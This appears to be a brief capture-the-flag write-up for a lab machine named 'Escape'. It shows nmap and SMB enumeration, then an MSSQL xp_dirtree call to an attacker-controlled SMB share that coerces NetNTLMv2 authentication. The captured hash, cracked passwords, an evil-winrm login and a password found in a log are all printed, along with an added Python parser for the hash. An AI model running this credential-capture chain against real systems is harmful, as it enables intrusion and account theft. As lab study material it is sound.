❌Escape
MSSQL | NTLMv2 | Leaking Certificate
nmap -A -Pn -T5 10.10.11.202 > escape.txt
Nmap scan report for 10.10.11.202
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
smbclient -N -L 10.10.11.202

smbclient -N //10.10.11.202/Public




xp_dirtree '\\10.10.14.111\fg0x0'

impacket-smbserver fg0x0 . -smb2support

sql_svc::sequel:aaaaaaaaaaaaaaaa:a67d3a6c2bc61d49438f83e8cb850d79:010100000000000080be93d2de50d901c497e13ee4bcfbb30000000001001000440063004b0064004a0053005500490003001000440063004b0064004a00530055004900020010006400470049007700520064004400530004001000640047004900770052006400440053000700080080be93d2de50d90106000400020000000800300030000000000000000000000000300000f26169eb30bf0eac34d3f6ff79ec092da66f9ebba85a0e852ac070ebeec4957d0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000
Cracked password: REGGIE1234ronnie (sql_svc)
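What the captured NetNTLMv2 line above actually contains, as an added example that is not part of the original notes: a Python parser that splits the line into its fields and decodes the AV pairs in the client blob, where the name of the host the service account authenticated to (cifs/10.10.14.111) is recorded. The function and dictionary names are this example's own; the input is the line from this page, split at field boundaries for readability.

```python
import struct
from datetime import datetime, timedelta, timezone

# The response captured on this page: user::domain:challenge:NTProofStr:blob
CAPTURED = (
    "sql_svc::sequel:aaaaaaaaaaaaaaaa:a67d3a6c2bc61d49438f83e8cb850d79:"
    + "0101000000000000" + "80be93d2de50d901" + "c497e13ee4bcfbb3" + "00000000"
    + "01001000" + "440063004b0064004a00530055004900"
    + "03001000" + "440063004b0064004a00530055004900"
    + "02001000" + "64004700490077005200640044005300"
    + "04001000" + "64004700490077005200640044005300"
    + "07000800" + "80be93d2de50d901" + "06000400" + "02000000"
    + "08003000" + "30000000" + "0000000000000000" + "00300000"
    + "f26169eb30bf0eac34d3f6ff79ec092da66f9ebba85a0e852ac070ebeec4957d"
    + "0a001000" + "00" * 16
    + "09002200" + "63006900660073002f00310030002e00310030002e00310034002e00310031003100"
    + "00" * 8)

# AV pair ids as defined in MS-NLMP (AV_PAIR structure)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
TEXT_IDS = {1, 2, 3, 4, 5, 9}  # values stored as UTF-16LE strings

def filetime(raw):
    """Convert an 8-byte little-endian FILETIME to an aware UTC datetime."""
    ticks = struct.unpack("<Q", raw)[0]
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)

def parse_netntlmv2(line):
    """Split a user::domain:challenge:proof:blob line and decode the blob."""
    user, _, domain, challenge, proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if len(blob) < 28 or blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge blob")
    out = {"user": user, "domain": domain, "server_challenge": challenge,
           "nt_proof_str": proof, "timestamp": filetime(blob[8:16]),
           "client_challenge": blob[16:24].hex(), "av_pairs": {}}
    pos = 28  # AV pairs start after the fixed 28-byte header
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        value = blob[pos:pos + av_len]
        if len(value) != av_len:
            raise ValueError("truncated AV pair")
        pos += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        out["av_pairs"][name] = value.decode("utf-16-le") if av_id in TEXT_IDS else value.hex()
    return out
```

In a packet capture or authentication log review, the TargetName pair is the field that shows a service account authenticating to an unexpected host.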

evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie



Select-String "Password" ERRORLOG.BAK
Username: Ryan.Cooper
Password: NuclearMosquito3

